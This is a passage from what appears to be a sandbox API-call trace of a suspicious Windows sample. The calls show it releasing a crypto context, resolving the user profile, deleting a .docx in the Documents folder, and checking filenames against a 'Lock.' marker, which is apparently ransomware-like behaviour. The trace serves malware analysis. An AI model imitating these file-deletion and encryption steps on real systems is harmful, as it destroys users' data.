lpMsg=0x8cf140) returned 0 [0215.804] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.804] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.804] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.804] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.804] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.804] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.804] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.804] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.804] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.805] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.805] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.805] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.805] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.805] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.805] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.805] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.805] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.805] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.805] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.805] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.805] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.805] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.805] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.805] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.805] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.805] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.805] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.806] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.806] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.806] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.806] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.806] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.806] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0215.806] CryptReleaseContext (hProv=0xa7c770, dwFlags=0x0) returned 1 [0215.806] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.806] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.806] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.806] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.806] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.806] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.806] FreeLibrary (hLibModule=0x76390000) returned 1 [0215.806] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.806] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.806] CloseHandle (hObject=0x510) returned 1 [0215.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.807] CloseHandle (hObject=0x504) returned 1 [0215.809] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.809] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.809] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.809] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.810] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/faIAqUgP BwWKbX.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\faIAqUgP BwWKbX.docx", lpFilePart=0x8cedf4*="faIAqUgP BwWKbX.docx") returned 0x2e [0215.810] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\faIAqUgP BwWKbX.docx" (normalized: "c:\\users\\fd1hvy\\documents\\faiaqugp bwwkbx.docx")) returned 0x20 [0215.810] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\faIAqUgP BwWKbX.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979fde90, ftCreationTime.dwHighDateTime=0x1d56be4, ftLastAccessTime.dwLowDateTime=0xedc4b1a0, ftLastAccessTime.dwHighDateTime=0x1d5ac8b, ftLastWriteTime.dwLowDateTime=0xedc4b1a0, ftLastWriteTime.dwHighDateTime=0x1d5ac8b, nFileSizeHigh=0x0, nFileSizeLow=0x96f7, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="faIAqUgP BwWKbX.docx", cAlternateFileName="FAIAQU~1.DOC")) returned 0x9e21f8 [0215.810] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\faIAqUgP BwWKbX.docx" (normalized: "c:\\users\\fd1hvy\\documents\\faiaqugp bwwkbx.docx")) returned 1 [0215.812] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979fde90, ftCreationTime.dwHighDateTime=0x1d56be4, ftLastAccessTime.dwLowDateTime=0xedc4b1a0, ftLastAccessTime.dwHighDateTime=0x1d5ac8b, ftLastWriteTime.dwLowDateTime=0xedc4b1a0, ftLastWriteTime.dwHighDateTime=0x1d5ac8b, nFileSizeHigh=0x0, nFileSizeLow=0x96f7, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="faIAqUgP BwWKbX.docx", cAlternateFileName="FAIAQU~1.DOC")) returned 0 [0215.812] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0215.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854308 | out: hHeap=0x2af0000) returned 1 [0215.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.813] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0215.813] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0215.813] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0215.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0215.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0215.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0215.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854308 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0215.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a749e8 [0215.815] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/faIAqUgP BwWKbX.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\faIAqUgP BwWKbX.docx", lpFilePart=0x8cf650*="faIAqUgP BwWKbX.docx") returned 0x2e [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a749e8 | out: hHeap=0x2af0000) returned 1 [0215.815] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\faIAqUgP BwWKbX.docx" (normalized: "c:\\users\\fd1hvy\\documents\\faiaqugp bwwkbx.docx")) returned 0xffffffff [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854308 | out: hHeap=0x2af0000) returned 1 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.815] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0215.815] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.815] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0215.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0215.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iN034yd-ltTggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N034yd-ltTggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="034yd-ltTggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="34yd-ltTggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4yd-ltTggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yd-ltTggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d-ltTggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ltTggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltTggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tTggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ggQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQ-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cC.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0215.817] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0215.817] HeapFree (in: 